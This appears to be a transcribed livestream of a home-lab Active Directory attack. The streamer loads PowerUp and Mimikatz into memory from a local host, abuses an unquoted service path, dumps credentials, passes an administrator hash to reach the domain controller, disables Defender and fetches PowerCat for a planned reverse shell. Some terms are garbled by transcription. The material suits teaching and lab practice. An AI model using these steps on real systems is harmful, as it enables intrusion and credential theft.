that is going to be it for enumeration. Alright. What's up, Chad B. Noob? How you doing? So now that we're done with enumeration, let's go ahead and start to look at escalating our privileges. Right, so going from being a user into, thank you, holy shit, Chad, thank you. Alright, let's go ahead and look at changing from being a, just a regular user to start to becoming an admin user, right? Start to become someone a little bit higher, okay? So, damn, dude. Chad, calm down, bro. Thank you very much. But Jesus. Alright. So we're going to start to look at becoming a higher user, right? Let's go ahead and get our command line open here. And the very first thing we're going to do is we're going to do another invoke expression, invoke web request, right? And we're going to use this for power up this time. So we do invoke expression, invoke web request, HTTP. Now, for everyone that's just joining us, we just did a bunch of enumeration with PowerShell and PowerView. Alright, I have a little network set up here with just a domain controller and a computer, and my host machine has a bunch of tools on it that we're pulling off, putting onto the Windows 11 virtual machine that's part of the domain. So we're able to utilize those different tools, such as PowerView, PowerUp, PowerView Dev, Mimikatz, things like that. Alright, so let's go ahead and we will now get power up on this guy. So we can do HTTP 192.168.0.33/powerup.ps1, right? There we are, okay? We did already do an Msi bypass for the people that are just joining us now. So we already did Msi bypass, and yeah, so on this machine. So now we have power up. Remember, we did invoke web request, so it's in memory, so it's not written to the disk. And now it's in memory. We're not going to do this in it right here where we type in powerup.ps1. That's not going to do anything, right? It's already running in the background. Very first thing we're going to do is invoke all checks. Right, and this is going to go through, it's going to check for a bunch of stuff, right? And straight from the beginning we see, hey, checking for unquoted service paths. Alright. Now, what is an unquoted service path? Literally exactly what it says. There are not quotes around that. If there's quotes around it, that tells Windows to go ahead and just keep going and find your final software that you're supposed to open. If there is not quotes around it, then we can write something that's called a BIS web server, and whenever it goes to run it, that program, it'll go to the C drive, and then it'll go into a BIS, and then it'll look for a BIS web server, and then it'll go to web, and then it'll look for a BIS web server, then it'll finally go into server, and then finally find what program it's actually supposed to run. So if we put this program right here to be right here, it'll now run before it gets to the actual program itself. That's what unquoted service path is. Literally what it says, right? It's not quoted. We can think of this just like within Kali Linux. Whenever we go touch something out that has space and stuff like that, and we put quotation marks around it to make our lives easier instead of putting 1,000 backslashes, right? That's exactly what we're doing, is we're making it quoted now. This is an unquoted service path. So what we can do is we can invoke service abuse for the name Abyss web server. And this is going to create a user. Alright. And what we're going to try to do is we're going to try to take that local, because we're going to create a local user. We're not going to create a domain user just yet. We're going to try to take this local user. We're going to get into him. So we're going to remote desktop into him or whatever else. And we're going to log into him. And then from there we're going to try to make a domain user from that local user, because he should have administrator privileges. So our final goal is to make a domain user that has administrator privileges from the local users that have domain privileges. If that makes any sense, like right there. I hope it does. So let's go ahead and we're going to try to do that guy. Okay, so let's hop over into, and I lost my Lost my stuff here. There we go. Let's go ahead and hop over, and you can see that his name is John, password 123. So if we were doing net user now, we see that John exists. Okay. If we do a net user slash or John, actually we can't even do that, but we see that John exists now, right? And we got password 123 exclamation point. So let's go ahead and log out of here. We will switch user to, remember, a local user now. So other user period slash John and password 123 exclamation point, and hopefully we log in through that, because that would be freaking sweet. And it looks like we are. Alright, he's going to get things ready for us. Windows has to do his whole I'm Windows thing, right? So the Windows do its thing. While it's doing that, I might go grab a soda. I don't know, it was a little late here. Again, Chad, thank you very much. Are you Vitana? He's getting really excited. Yeah, I don't care. Probably won't though. Are you Fatina or whatever? Alright, cool. So we're here now. Let's go ahead and hop over into PowerShell. Right, and let's do a net or a whoami/priv first. And let me also get this a little bit bigger for you guys. And as you can see, we are not running as administrator. Actually, let me go ahead and go back into PowerShell. Right click, and we're going to say run as administrator. Now remember, when we made that user, it put them in the administrators group. So now we can just right click and run as administrator, and we're now an administrator, right? So whoami/priv, and we don't really have many things enabled. That's okay though. Alright. I mean, we do have first name client after authentication, so that's good. You got a spam bot. Yeah, I know. Oh, do I have? I don't have one. But yeah, that's coming around every once in a while. Those guys. I like to talk back to them. I'm like, hey, how you guys doing? Are you Fatina? They never actually talk back, but probably because it's a spam bot. But you know, I'm always hoping that one day it's an actual person. They just say, good, how are you? Alright, so we got this like right here. Alright, and let's go ahead and try to create a user on the domain. Now, I don't know if this is going to actually work, but we're going to try it. We're going to do a net local group administrators, right? Because we know that there's an administrators group, right? So net local group administrators, and then it's going to be Alice slash, and now we need to put in somebody that already exists. So john.doe, and then we'll say slash add, or it should be the other way, right? Slash add, like that, correct? I believe it's that way. I just did it. No. Slash add. There we go. So I did net local group administrators. We know that administrators work, right? Domain. Okay. So we got the domain username slash add. Let's see if this works. Command complete successfully. So John Doe should be part of the administrators group now. Let's see if we can add someone that doesn't even exist on this machine. Ryan Y. There's no such user. Yep, is Ryan Y. Okay, but John Doe should now be an administrator supposedly on this machine, right? So let's go ahead and hop back over to John Doe, and we'll see if he is. So John Doe is already signed in. Alright. Let's go ahead and get into him, okay? We'll exit out of here, and we will type in command prompt or PowerShell, right click, run as administrator, and we get this like little thing. So nope, that did not work for us, right? I mean, we could try John.doe. Oh, okay, John Doe is an administrator. Never mind, it actually worked. Usually, if you're already an administrator, you're going to have to type that in. Usually, it just lets you in like that. Maybe because we weren't signed out. Maybe because we just switched users or something like that. So we are now an administrator, right? And John Doe is an administrator, and he's good to go now. Let's go ahead and go to font. Alright, make that bigger for you guys, and we'll do a whoami/priv. Alright, that's okay. We got enough privileges at least. And let's start to now try to see what else we can do here, right? So let's do our IEX, IWR, HTTP 192.168.0.33 / will be powerview.ps1. We're going to do that same thing. Oh, nope, I'm not going to do anything actually because I need to get my Msi bypass. So let me just grab that like real quick. Like I was saying before, remember that you can find those pretty much anywhere on the internet. Okay, so there we go. We'll do a powerview dev.ps1. And we'll also do an invoke Mimikatz. And let's see if we can get that too. Mimikatz is obviously huge, so that's going to take a second. Alright, cool. Now let's go ahead and we're on domain now. Let's try to see if we can find local admin access anywhere else. We already know that. We're an admin there, so we already know that one. What I'm hoping for is that we can do a PS session somewhere else. PS session is kind of like PS exec or like WinRM, like evil win or whatever, things like that. But PS exec or PS session, kind of like all that stuff on crack. It's pretty cool thing. So this guy's taking a minute. You shouldn't really be taking that long with this network. Let's try to go for it. Ses equals new PS session, right? Let's go ahead and get the computer name again. So we're gonna do a get net domain controller, right? We'll grab that computer name again, and we'll do a $ ses equals new PS session computer name that failed to find error access is denied. Ooh, so maybe I did not become an administrator like I thought. Maybe that's more like a local thing. So let's go ahead and try to do power up again. Power up, and we will go ahead and do that invoke all checks again. Alright, let's go ahead and invoke service abuse. TAC name is going to be Abyss web server, right? And then from here we're actually going to do a TAC username, and we'll say it's Alice / let's just make a new person, Ryan Y, because I think I should be able to make a new person with this one. We'll say password is going to be PSINSSW0RD123 exclamation point. Let's try that. So I think I can actually create a new user like this. Okay, supposedly I'm in the administrators group as Ryan Y. Get that user. Select Sam account name. Man, this thing is not like me like right now. I have noticed the more that you mess with it and stuff like that, the more kind of you're gonna start getting crap like this. So we're not seeing Ryan Y anywhere now, are we? Did I do the slash the wrong way? So I do like to do that. I do the slashes the wrong way many times. That actually looks better, like right there. Because that should make me a new user, should. But I mean, I have no idea. Get net domain user. How is that Wonderland not local? Something like that. there's John Doe. That's what we've been using. Maybe we should just try getting his header. Maybe we should just make it administrator. Or something like that. Because that should have technically worked. As far as I can think. That should have worked like right there. What we'll try to do is try to log out and just log in as Ryan Y. We'll try something like that. Let's go ahead and switch user. We'll try it with Ryan Y. Yep, he does not exist. That's 100% correct. Okay. So John Doe. John Doe. There's him, but he is not an administrator now, is he? So I'm getting this like right here. Yeah, this shouldn't actually come up if I am actually an administrator, like right there. So let's go ahead and try. Let's go ahead and do this. And then from here what we'll do is let's go ahead and do a net stop, maybe Abyss web server, see if we can stop it and start it. Net start Abyss web server, maybe it has to do something like that. And then we'll log out of this machine, we'll sign out, and then sign back in as John Doe. I know when I've done this before also with like remote desktop stuff like that, I've had to leave the whole thing, you know, like actually like close out everything. Let's try that. Hopefully that works. There we go. So yep, I had to log all the way out and log all the way back in again. Who am I? Because now we are running as administrator. Who am I / Priv. Alright, well we were running as administrator as far as I could tell. I feel like I should have more than just that on there, but supposedly we're running as administrator like right now. But we'll see here in a second. Let's go ahead, let's get a bigger font for you guys, then we'll do a net user or net local group. I don't know why. Powershell Msi Bypass. Okay. And then from here we can start to do everything else. Let's go ahead and get that. Yep, that guy in there again. And I'm just going to try to go straight into a session. So let's try to do a new session. Access is denied. But I just opened this as an administrator, which is very, very strange. See, that is an administrator right there. I'm wondering if I need to do more. Like net user, net local group, power users, /add John.doe. Okay. Net local group, remote desktop users. Do I have to do it like this? There's already a member of the group. Okay, cool. What about for power users? Or is that a group probably doesn't exist, huh? Okay. What about domain users? Specify group does not exist. Okay. And he's already part of that. So he's an admin now. We're able to log in everything. For some reason we still can't get a PS session with alice.wonderland.local. Still, that is okay. because we can load Mimikatz, right? So let's go ahead and do an IEX, IWR. Invoke Mimikatz.ps1. Right, and let's try to do some Mimikatz stuff here and see if we can get anywhere with this. Alright, let's go ahead and do an invoke Mimikatz dump creds. See if we get anywhere with that. And let's try to do like a pass the hash or something like that. Maybe we can do something like that and be able to get a PS session through there. Maybe. I don't know. I'm just saying words now, just making stuff up. Maybe cat's taking a minute. So weird. I feel like I should have a lot more privileges if I was administrator also. This guy is taking his sweet time too. Oh, there we go. Okay, cool. So let's see if we have like the administrator's hash. How about that? What in the flying hell? That is 100% not an MTL. I don't know. That's a new one for me. Okay. Man, that's a lot of people. Okay. There's John Doe. Alright, John Doe. Username, that's computer. Is there an administrator on here? I'm not seeing administrator anywhere on here. I feel like there should be though. Computer itself. Let's try just invoke Mimikatz without dump creds, and we'll try the LSA dump after that. Because that's very strange also that we're not getting anything on there, such as administrator. Come on now, Mimikatz. That does take a minute, huh? Does not mess around, does it? Can we actually open up another one of these guys? Administrator, yes please. Okay. I'm pretty sure dump creds here, that thing just invoke Mimikatz, isn't it? Let's go ahead and do it, invoke Mimikatz. LSA dump / patch, right? I think it's like that, if I remember correctly. LSA dump / patch, and we'll see if we get anything there. Yeah, I've just been kind of messing around with this domain controller and everything, so I haven't really got everything where it's like, oh yeah, then do this next, then do this next. So it's kind of like me Also learning what to do next. Because I didn't see this one coming where I'd be an administrator but not be an administrator. I'm wondering, is the session interactive from 4? That's weird to me. I'm wondering if there's like 2 John Does here and I messed up somehow. No, because the password hashes are the same. NTLM hashes are the exact same on each one. So, nothing crazy like that. Oh, cat command. Yeah, cat command. If you ever see this, like right here, computer names are not valid. If you're trying to pass a URI, then like right there, it's you didn't do a tat command, or you typed in tat computer name and it was supposed to be tat command. I get that one a lot. What's also funny is I actually did this not too long ago and I actually got on like that. I can still ping the domain controller, right? Okay, I can't ping the domain controller, that's good. No, isn't that it? LSA dump? Or is it LSA dump LSA? Is it LSA dump LSA? That doesn't look right to me, like right there. LSA dump LSA does not look right to me at all, but might be that one. If anybody else knows, feel free to let me know. I've noticed that sometimes it'll like freeze up, so if you hit enter a couple times, all of a sudden everything comes down. I've noticed that with Powershell. That seems to freeze up sometimes. Okay, there we go. Alright. Administrators now have an NTLM hash. How? John does. Who's John? I think pass the hash to John? How does an administrator not have an NTLM hash though? I feel like he does. Who's John? Let's see what John's all about here. Let's go ahead and try to pass the hash with John, I guess, and we'll see what happens. So we'll do an invoke Mimikatz attack command, and then it's going to be sec urlsa lsa securlsa, however you want to say it. Okay, urlsa pass the hash right / user. Right, and then I think we can put in a user we want. It doesn't have to be John, right? We can just like administrator or whatever. Right, domain NTLM user. We'll say administrator tr administrator / domain, which will be alice.wonderland.local / ntlm, which is going to be that guy / run powershell.exe. And that should open up another PowerShell under John. But I have no idea who the hell John even is. I don't know if he's what he's part of. I know who John.do is. I don't know who John is. Oh, John might be a damn administrator. I don't know. We don't know till we try. My thing is, why is an administrator on there? What I should do, I think, is just like log off, log in as administrator, right? And then that should put that hash in there afterwards. Because that's very strange. Come on now, John. I think. I think that's it. I think that's all I need. No, my own ad bar is going crazy. It's like, hey, you shouldn't be doing this. Okay. Well, we got our PowerShell to open up, so we definitely passed the hash. Who am I? And I'm still John.do, which is okay. This is going to be posted. It will be posted to YouTube. Yes, Chad. So every Monday and Wednesdays the videos come out on YouTube. These ones won't be posted till like May time frame, though. Alright, so let's go ahead and do a. Let's see if John has the ability to do this. New PS session. dc01.alice.wonderland.local. Okay, so he does not. Yeah. Failed to find the username and password is incorrect. What? So whenever it passed the hash there, it wasn't correct supposedly, which is very strange. Okay, that's not right. Is it password 123 exclamation point? No, okay. Let's go ahead and let's log out of here. Let's log back in as, so let's go ahead and sign out. John signed in. Let's go ahead and sign out of here. And let's go ahead and log in as an administrator, because then we'll get that hash. That might be the only problem, like right there, is that it's just not. I may have never logged in as administrator on this computer, maybe something like that. So I want to try to do this, get back in there, try to run Mimikatz again, and then we'll just do something like that. But yeah, these ones will be coming out in May time frame, Chad, just because I have so many in front of it. So I do try to put them out as soon as possible, but this is also not my job, so it's kind of like, you know, I'm gone for sometimes up to like 3-4 months at a time, so I have to be able to make the YouTube extend out throughout those periods of time whenever I'm gone. Although soon I'll be done with that, so that'll be good. I'm going to run as administrator again. Okay, so we ran as administrator, that's good. It's kind of weird how I have to do the YouTube. It has to be a few months out, so you'll like see like a video, and then if you watch the YouTube channel, you'll be like, hey, like that was a few months ago. So let's go ahead and do an IEX IWR 192.168.0.33. Now, just so you guys know, also we're still going. Oh, thanks. Just so you guys also know, on the YouTube, it is on the YouTube. That's how It's not like I'm 95 on the YouTubes. No, on YouTube, it is, it's pretty much exactly what you see here. Like, there's not much editing going on there. The only thing I really do is I turn up the mic like a little bit and get rid of the background noise. That's the only thing I really try to do, like right there. But yeah, it is. If it takes me, unless if it's a brute force thing, other than that, I usually don't really delete much content off of YouTube. So it's just going to be the same thing, pretty much, of me struggling trying to do stuff. Some people like it, other people hate it. Alright, so let's go ahead and do an invoke Mimikatz again. Command. And it was LSA dump, right? LSA / patch. No, this is not Hack the Box. This is actually just my own domain controller and Windows 11 virtual machine that I set up, and yeah, I'm just seeing what I can do with it. Just kind of, just set up a few users on it, and just want to see, how can we bypass stuff, how can we get into stuff, can we actually do PS a session on it, PS remoting, things like that, and just kind of mess around with it. So I have no idea if this is even actually vulnerable. Nothing. I did not tear down any firewalls. Real-time monitoring still on. Everything's still on. So, like right now, this Mimikatz is running, and real-time monitoring is on this machine for Windows 11, Windows Defender, and everything also. So Mimikatz is bypassing that with it being in memory with the IWR there, which I think is pretty cool. So for some reason, we should be getting the administrator hash like right here, and we're not. And I'm not understanding why we are not. We'll try dump creds one more time. Yeah, I'm not really understanding why we're not getting the administrator hash. I'm pretty sure I cannot log in with the W8DAG utility account. I'm pretty sure that's not going to allow me to do that. But we should be seeing a hash for administrator. It's super weird that we're not seeing that. Maybe we could try. The guy has a hash. I mean, we can always try. I'll take it, but it'd be, if we can log with this guy, that would be, what the heck, Oh, no, I want a Powershell. Run as administrator, yes, please. And let's get that guy. Invoke Mimikatz back up and on there. So I could be at this for like 10 hours and maybe nothing will happen. I have no idea. Let's see here. Is administrator on this guy at all? Should be at the top if he is. I literally just did log in with him, so. What I'm also kind of surprised about too is that the administrator password null. How is the password administrator? Okay, here we go. So we did log in as administrator, and now we have administrator right here. So let's go ahead and grab that NTLM, and let's do a invoke Mimikatz, right? Tac command, right? It's going to be SE circlesa pass the hash, right? And then it's going to be, we need domain, user, NTLM, and the run command. So /user administrator /domain, right? alice.wonderland.local /NTLM, right? /run PowerShell.exe. I think that should be it, like right there, to pass the hash for Mimikatz with the administrator's hash. Now hopefully this one works like right here. Hopefully. I mean, I have no clue. We'll see if a new PowerShell prompt opens up, and if it does, that's good. That's the first part of it. At least need PowerShell to open. Come on. Come on. Oh, okay, we got PowerShell open, okay. Where am I / Priv? I should still be John.doe. Yep, I should still be him. I should be him until I go to get into another system, which then I pass the hash. So, let's go ahead and let's try to pass the hash now, I guess. We already did pass the hash, so we should be able to do. Hopefully this works. This doesn't. That's about the last idea that I had. I would have to go back into it and start to mess with stuff again. So dc01.l, it's not wonderland.local, and I'm getting pretty tired also. It's just about 2 a.m. here. So if this doesn't work, I don't know how much longer I'm going to be awake. And it did work. We now have a new PS session, right? Like I was saying before, PS session is kind of like PS exec, except for on crack. Okay, we can send script blocks at it. So we can say, and we can also send file blocks at it. So what we can do is we can actually, like, let me see here. We can do like a invoke command script block, and we see right now, we see that I am John Doe. I'm John Doe, right? That's because I'm John Doe on this machine, yes. But as soon as I created this session, when I talk to that session, Kerberos Granny Ticket is then going off, right? But I'm passing the hash. So when I do that, I'm telling the domain controller, like, yo, I'm him. Oh, I should have said Kerberos. I should have put Kerberos in there. But I'm telling the domain controller, like, hey, I'm actually this person, because I'm going across the network now, so I have to pass that hash, right? So we can do an invoke command, script block. Okay. And we'll do a script block, and we're going to say, I think it's like that. I think it's those weird curly brackets that when you were a kid, you made them one time and you thought you were the bee's knees. I think it's those ones. Yeah. Who am I? Right. For session $ses. And as we can see, I'm administrator. So I made a new PS session, right, to this computer name, okay, which is domain controller, right. I then said, hey, I want to invoke command, alright, who am I, to this session, which is the domain controller. Thus, I am now the administrator because I'm doing a pass the hash, which now means that I can tear down the firewall in the domain controller. And I can say, screw you, domain controller, so let's go ahead and let's do that. Or I can also enter a PS session there. So let's go ahead and enter a PS session. So we're going to say enter PS session, alright, and it's going to be for session ses. This is actually really exciting for me. So as you can see, we are now part of the domain controller, right? But the domain controller has its firewall up. All this stuff's still working. All this stuff's still working over here, so invoke Mimikatz may actually work. Let's go ahead and give it a try. IEX, IWR. You guys can't see that. Invoke Mimikatz. .ps1. See if that works. That did work. Okay, so invoke Mimikatz did actually work. Now this is on the domain controller. Nothing is shut down. So real-time protection is still up and running. Antivirus is still up and running. If I actually go to this guy right here, you can actually see that everything on here is still up and running. Let me see here. As we can see, virus protection is still up and running. Everything is still up and running. Manage settings, real-time protection is still on. but Mimikatz was working, and didn't find anything, right? So I want to see actually protection history so you guys can actually see. Look at this. This is when I was practicing it with Power Up. It's over a couple of days. Alright. So invoke command. Okay. Or invoke Mimikatz. Now, actually, let me show it to you guys this way. Let's go ahead and exit out of here, okay? We can actually, instead of script block, we can do a file. Okay, so we don't need to do script block. If I can remember, I think it's file path. I think it is, but I think I need the file. No, we're not going to be able to because I need that file actually on myself. So if I had invoke Mimikatz on myself, I could actually run file path on here and then do like a file path invoke Mimikatz, but never mind. We're actually going to do a script block, and we're just going to do it all through script block. So we're not actually going to get in this machine at all. We're going to do it like this. So we're going to say script block, and we're going to put all of this into there. Alright. For that session. Oh, and content has been blocked by our antivirus software. So this time it was. The last time it was not. That's super weird. Okay. That's okay though. That's alright. Let's go ahead and do an Msi bypass. Let's do that. So let's grab my Msi bypass. That is weird, man. Because literally just a second ago it wasn't blocked. Windows, what are you doing? Alright, let's go ahead and grab an Msi bypass. There we go. And we'll try that same command again. Invoke Mimikatz. The script malicious content has been blocked by your antivirus software. Okay. Let's go ahead and do the Msi bypass. And then we'll do a little boom, little semicolon like right there. And then put this in. That is 100% the Msi bypass again, so that's not going to work. So let's go ahead and do Msi bypass, right? Bam. And let's grab this guy right here, right? So then we're going to run that after the Msi bypass, right? And then from here, what we can do is we can run invoke Mimikatz, attack dump threads. Let's try that. Been blocked by antivirus. There is something else we can do. So since it's being blocked by antivirus, which is that's okay, we can tear it down. So we can disable real-time monitoring. And this is going to be on the, so right here, like where we quit, right? So let's go ahead and, actually, you know what? Let's go right back over to here, okay? We're actually going to disable real-time monitoring. Okay, so we're going to set MP preference, disable real-time monitoring to true. Session's going to be for the SES. Now let's go ahead and try to invoke Mimikatz through script block. Ooh, still been blocked. Man, this thing is kicking my behind. Maybe I have to do it like that now. Nope. This thing's kicking my ass. Alright, looks like I am going to have to get into a session there, huh? What if we can do a session the other way? Let's try something else. Let's try to do a... Let's try to download something. So let's try to download, and we'll use something called PowerCat also, because that'll be exciting, I think, for everybody to see. I'm just going to try it. So let's go ahead and do a wget. HTTP 192.168.0.33, right? PowerCat.ps1. Alright, attack out file will be PowerCat.ps1. Alright, enter. Oh, I did that in system 32 and it definitely found that one. Okay, it said, yeah, you can't do that, big guy. Alright, but what we can do is we can actually tear down the firewall over here if we really want to and be able to use PowerCat. And what I'm thinking is maybe to try to create a reverse shell, but I don't want to do too much in this video because we still have more videos coming up. So let's just go ahead I'm done. I'm getting way too ahead of myself. Let's just go ahead and get into the domain controller and do an invoke Mimikatz. And that'll be it for this one. I'm going to enter PS session. Session is going to be $sess, right? I'm getting way too ahead of myself. We'll go ahead and do an IEX IWR invoke Mimikatz.ps1, right? I might have to do an Msi bypass. I don't know. No, we do not. Let's do an invoke Mimikatz dump creds, and we'll just do that. How you doing, Sharma? But yeah, we'll just do that for today. Tomorrow, the next day, whenever I get on again, it'll be tomorrow, the next day. Then we'll use PowerCat and create a reverse shell from the domain controller back to me. Hopefully with script block. Hopefully, we shall find out. Excuse me. But yeah, we'll try something like that, and there we go. Okay, so we have dumped the credentials on the domain controller, right? Which is obviously a big deal. Okay, we're obviously looking for administrator domain privileges, or whatever, something like that. Okay, but yeah, so or any other domain or any other privileges you haven't seen yet. Like I said, this is a brand new network. I have not really logged in with anybody yet. I haven't really made anybody yet. There's an administrator like right there. There's the NTLM. Okay, so we could try to use that guy and use him to pass the hash or whatever else. Alright. But I think that's going to be it for today. Alright. Tomorrow we'll try to do some reverse shells from here. We'll see if those work. From the domain controller back to my Windows 11 machine. And the next day we'll try to do some ASREP roasting, and then maybe start with the ASREP Kerber roasting, and do all those things that are on my PMPT stuff on YouTube, but we'll do it on here with with PowerShell. So thanks again, everybody. Thanks again, Chad, for all the subs there. That's freaking awesome. And you guys have a good night. All right.